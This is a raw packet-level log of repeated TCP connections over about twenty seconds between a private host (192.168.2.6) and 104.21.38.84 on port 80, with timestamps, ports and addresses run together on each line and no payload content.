                                                                                                                  Jan 1, 2025 16:05:43.266664982 CET8062938104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.313986063 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.440114021 CET8062938104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.485861063 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.561276913 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.561286926 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.566116095 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.566416979 CET8062938104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.566507101 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.566530943 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.566648960 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.571423054 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.924943924 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.929827929 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.010426998 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.189172029 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.261524916 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.348366976 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.350863934 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.465557098 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.465558052 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.470351934 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.470515013 CET8062939104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.470551968 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.470592022 CET6293980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.470664978 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.475474119 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.829787970 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:44.834651947 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.918335915 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:44.985863924 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.183626890 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.322726011 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.339626074 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.339632034 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.343260050 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.343991041 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.348228931 CET8062940104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.348283052 CET6294080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.348804951 CET8062941104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.348871946 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.348939896 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.353739977 CET8062941104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.706859112 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.711735010 CET8062941104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.722810030 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.722820044 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.727690935 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.731070995 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.731070995 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.734113932 CET8062941104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.735949993 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.735989094 CET6294180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.839217901 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.844033957 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:45.844259024 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.844475031 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:45.849284887 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.082820892 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.087676048 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.087831020 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.174669027 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.190834999 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.195667982 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.300395966 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.345287085 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.376861095 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.388240099 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.485887051 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.556008101 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.610888004 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.671295881 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.671437025 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.671936989 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.676393032 CET8062942104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.676464081 CET6294280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.676655054 CET8062943104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.676708937 CET6294380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.676748037 CET8062944104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:46.676814079 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.676917076 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:46.681725979 CET8062944104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.032835960 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.037683964 CET8062944104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.149229050 CET8062944104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.282762051 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.324866056 CET8062944104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.396874905 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.452215910 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.457056999 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.457118034 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.457212925 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.461944103 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.814169884 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:47.819016933 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.901918888 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:47.954639912 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.161030054 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.206810951 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.269573927 CET6294480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.279505968 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.281819105 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.284430027 CET8062945104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.286653996 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.286685944 CET6294580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.288213968 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.288392067 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.293123007 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.642244101 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.647100925 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.741708994 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.783238888 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:48.913104057 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:48.954634905 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.033246994 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.033674955 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.038213015 CET8062946104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.038255930 CET6294680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.038476944 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.038536072 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.038701057 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.043512106 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.392277002 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.397258997 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.483889103 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.532845974 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.671397924 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.720272064 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.793400049 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.793402910 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.798314095 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.798475027 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.798523903 CET8062947104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:49.798646927 CET6294780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.798966885 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:49.803807974 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:50.158819914 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:50.470818996 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:50.940080881 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:50.940098047 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:50.940169096 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:50.940166950 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:50.940206051 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:50.940984011 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:50.941176891 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.284082890 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.329652071 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.468379021 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.469259024 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.473465919 CET8062948104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.473526001 CET6294880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.474133968 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.474221945 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.474396944 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.479168892 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.515738964 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.515980959 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.520593882 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.520657063 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.520849943 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:51.525576115 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.567013025 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:51.876609087 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.189049006 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700057030 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700072050 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700079918 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700089931 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700114965 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700118065 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700143099 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.700158119 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700165033 CET6294980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700170994 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700193882 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:52.700917006 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.701159954 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.704998016 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:52.705005884 CET8062949104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.049778938 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.095273972 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.169178963 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.170002937 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.174217939 CET8062950104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.174276114 CET6295080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.175091028 CET8062951104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.175179005 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.175251007 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.180488110 CET8062951104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.533072948 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.537848949 CET8062951104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.622698069 CET8062951104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.673397064 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:53.887413025 CET8062951104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:53.939033985 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.236712933 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.241539001 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.241605997 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.241805077 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.246551991 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.595365047 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.600244999 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.844949007 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.857367992 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.857462883 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.981569052 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.981973886 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.986627102 CET8062952104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.986716986 CET6295280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.986742020 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:54.986829996 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.986917973 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:54.991719007 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.345475912 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.350285053 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.458256006 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.501586914 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.621227980 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.673418045 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.745232105 CET6295180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.749921083 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.750705957 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.754914999 CET8062953104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.754986048 CET6295380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.755455017 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:55.755526066 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.755606890 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:55.760298014 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.111134052 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.115952015 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.200088978 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.251540899 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.475941896 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.518841982 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.534848928 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.534887075 CET6295580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.539671898 CET8062955104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.539886951 CET8062954104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.542943954 CET6295480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.542952061 CET6295580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.546849012 CET6295580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.551692963 CET8062955104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.590858936 CET6295580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.594847918 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.599769115 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.602945089 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.603003025 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.607737064 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.643045902 CET8062955104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.897445917 CET8062955104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:56.897567987 CET6295580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.958851099 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:56.963794947 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.055696964 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.110991955 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.325978994 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.378849983 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.450849056 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.450867891 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.455758095 CET8062957104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.455899954 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.455914021 CET8062956104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.456011057 CET6295680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.456084013 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.460835934 CET8062957104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.814174891 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:57.941555977 CET8062957104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.941962957 CET8062957104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:57.985925913 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.200733900 CET8062957104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:58.251573086 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.328599930 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.333486080 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:58.333549976 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.333657026 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.338454962 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:58.689393044 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.694259882 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:58.803641081 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:58.845312119 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:58.978002071 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.032797098 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.086869955 CET6295780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.094851017 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.094860077 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.099683046 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.099797964 CET8062958104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.099939108 CET6295880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.099941015 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.100018978 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.104756117 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.454870939 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.459836960 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.553180933 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.595304012 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.756119013 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.798435926 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.873790979 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.874558926 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.878906965 CET8062959104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.878971100 CET6295980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.879462004 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:59.879663944 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.879852057 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:59.884646893 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.235980034 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.240869999 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.325068951 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.376611948 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.499767065 CET8062960104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:06:00.548580885 CET6296080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:06:00.622059107 CET6296180192.168.2.6104.21.38.84
